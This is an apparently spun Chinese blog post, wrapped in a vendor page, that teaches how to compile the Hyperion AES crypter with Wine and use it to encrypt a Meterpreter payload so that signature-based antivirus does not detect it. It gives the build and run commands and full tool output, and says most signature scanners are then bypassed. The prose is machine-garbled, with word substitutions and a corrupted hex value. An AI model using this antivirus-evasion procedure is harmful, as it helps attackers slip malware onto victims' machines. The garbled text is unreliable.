售前咨询
技术支持
渠道合作

好免杀,hyperion造

好免杀,hyperion造

在上一篇的《那些年我们一起绕过的杀软》中,是不是发现大师做进去的小东西总是被杀软杀呢?那好,本日,小编就来教你如果躲规避人腻烦的杀软…本日我们用来做演示的是一款加密器材hyperion.下文将 介绍他的义务原理以及若何被编译。

Hyperion是一款防御你的payload被杀毒软件攻破的加密器材。它通过5轮AES(初级加密标准)加密来为你的payload做维护程序,而且加密后的payload是大要在windows零碎下运行的。它的义务原理是酱紫的: 它输出一个可执行的加密文件,没错,这个文件即是你冲击时用的payload。 当这个输出文件天生并在目标机子上被执行当前, 这个可执行文件就会测验考试暴力破解这个加密文件的AES加密算法的KEY, 破解当前就会自动运行这个被加密的文件 (meterpreter payload ).

说了这么多,然则我们这么取得并编译它呢?别急别急,好戏才刚刚劈头:

Hyperion下载地点: http://trustauth.cn/tools/binary.html

下载完结并解压当前,发现有Makefile文件,so easy啦!甚么你照样菜鸟不会?好吧…你淫了。如果你有变态5,大要测验考试一下上面的傻瓜式编译:

先辈入如下目次:

Default

1 cd ~/.wine/drive_c/MinGW/bin/

把下载解压后的源码放在 “Src”目次下. 此后执行如下的号令:

Default

1 wine g++.exe Hyperion-1.0/Src/Crypter/*.cpp -o hyperion.exe

如果号令没错的话, 此刻hyperion.exe就曾经做好了,下一步即是来为我们的payload编码加密了,扫数流程都是自动化的,你只要指定输出文件夹路径与输出文件称谓,此后一个做好免杀的payload就进去了,扫数过程看上去就像上面所示:

Default

1 root@bt:~/.wine/drive_c/MinGW/bin/Hyperion-1.0# wine hyperion.exe metexecutable.exe encryptedmet.exe

执行后果:

Opening metexecutable.exe
Copied file to memory: 0×115868
Found valid MZ signature
Found pointer to PE Header: 0×80
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0×400000

Found Section: .text
VSize: 0×九24, VAddress: 0×1000, RawSize: 0xa00, RawAddress: 0×400

Found Section: .data
VSize: 0x5f0, VAddress: 0×2000, RawSize: 0×600, RawAddress: 0xe00

Found Section: .rdata
VSize: 0xc0, VAddress: 0×3000, RawSize: 0×200, RawAddress: 0×1400

Found Section: .bss
VSize: 0xe0, VAddress: 0×4000, RawSize: 0×0, RawAddress: 0×0

Found Section: .idata
VSize: 0×268, VAddress: 0×5000, RawSize: 0×400, RawAddress: 0×1600

Input file size + Checksum: 0×4140
Rounded up to a multiple of key size: 0×4150
Generated Checksum: 0xcf0cc
Generated Encryption Key: 0×0 0×2 0×1 0×2 0×3 0×3 0×0 0×0 0×0 0×0 0×0 0×0 0×0 0×0 0×0 0×0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file’s image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file’s image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encryptedmet.exe
FASM Working Directory: C:\MinGW\bin\Hyperion-1.0

Executing fasm.exe

flat assembler version 1.69.31 (1020166 kilobytes memory)
5 passes, 0.1 seconds, 35328 bytes.

嗯哼,此刻大少数靠特征码查杀的杀软就能够求助绕过了.然则开导式杀毒的就不定然啦…小编也没那么蛋疼装十几个杀毒软件一个一个做测试吧…

上一篇:

下一篇:

相关新闻

 

领取优惠
免费预约

申请试用SSL证书

提交成功!

咨询客服